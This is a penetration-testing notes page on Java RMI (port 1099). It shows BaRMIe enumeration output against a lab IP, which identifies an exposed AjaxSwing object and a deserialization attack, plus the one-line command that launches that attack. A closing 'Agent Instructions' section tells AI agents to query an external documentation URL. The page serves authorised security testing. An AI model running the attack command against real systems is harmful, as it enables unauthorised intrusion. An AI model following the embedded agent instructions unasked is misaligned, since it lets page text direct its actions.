# 1099 - Java RMI

Use BaRMIe to enumerate functions

<https://noraj.gitlab.io/the-hacking-trove/Tools/barmie/>

Download standalone:&#x20;

<https://github.com/NickstaDB/BaRMIe/releases/>

Enumeration:

```

root@kali:$ java -jar BaRMIe_v1.01.jar -enum 172.16.11.18 1100 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true 

  

  ▄▄▄▄    ▄▄▄       ██▀███   ███▄ ▄███▓ ██▓▓█████  

▓█████▄ ▒████▄    ▓██ ▒ ██▒▓██▒▀█▀ ██▒▓██▒▓█   ▀  

▒██▒ ▄██▒██  ▀█▄  ▓██ ░▄█ ▒▓██    ▓██░▒██▒▒███    

▒██░█▀  ░██▄▄▄▄██ ▒██▀▀█▄  ▒██    ▒██ ░██░▒▓█  ▄  

░▓█  ▀█▓ ▓█   ▓██▒░██▓ ▒██▒▒██▒   ░██▒░██░░▒████▒ 

░▒▓███▀▒ ▒▒   ▓▒█░░ ▒▓ ░▒▓░░ ▒░   ░  ░░▓  ░░ ▒░ ░ 

▒░▒   ░   ▒   ▒▒ ░  ░▒ ░ ▒░░  ░      ░ ▒ ░ ░ ░  ░ 

  ░    ░   ░   ▒     ░░   ░ ░      ░    ▒ ░   ░    

  ░            ░  ░   ░            ░    ░     ░  ░ 

       ░                                     v1.0 

             Java RMI enumeration tool. 

               Written by Nicky Bloor (@NickstaDB) 

  

Warning: BaRMIe was written to aid security professionals in identifying the 

         insecure use of RMI services on systems which the user has prior 

         permission to attack. BaRMIe must be used in accordance with all 

         relevant laws. Failure to do so could lead to your prosecution. 

         The developers assume no liability and are not responsible for any 

         misuse or damage caused by this program. 

  

Scanning 1 target(s) for objects exposed via an RMI registry... 

  

[-] An exception occurred during the PassThroughProxyThread main loop. 

    java.net.SocketException: Socket closed 

[-] An exception occurred during the ReplyDataCapturingProxyThread main loop. 

    java.net.SocketException: Socket closed 

RMI Registry at 172.16.11.18:1100 

Objects exposed: 1 

Object 1 

  Name: creamtec/ajaxswing/JVMFactory 

  Endpoint: 172.16.11.18:49671 

  Classes: 3 

    Class 1 

      Classname: java.rmi.server.RemoteStub 

    Class 2 

      Classname: java.rmi.server.RemoteObject 

    Class 3 

      Classname: com.creamtec.ajaxswing.core.JVMFactory_Stub 

  

1 potential attacks identified (+++ = more reliable) 

[---] Java RMI registry illegal bind deserialization 

  

0 deserialization gadgets found on leaked CLASSPATH 

[~] Gadgets may still be present despite CLASSPATH not being leaked 

  

Successfully scanned 1 target(s) for objects exposed via RMI. 
```

Exploitation use&#x20;

```
java -jar BaRMIe_v1.01.jar -attack 172.16.11.18 1100
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infra.newerasec.com/infrastructure-testing/enumeration/services-ports/1099-java-rmi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.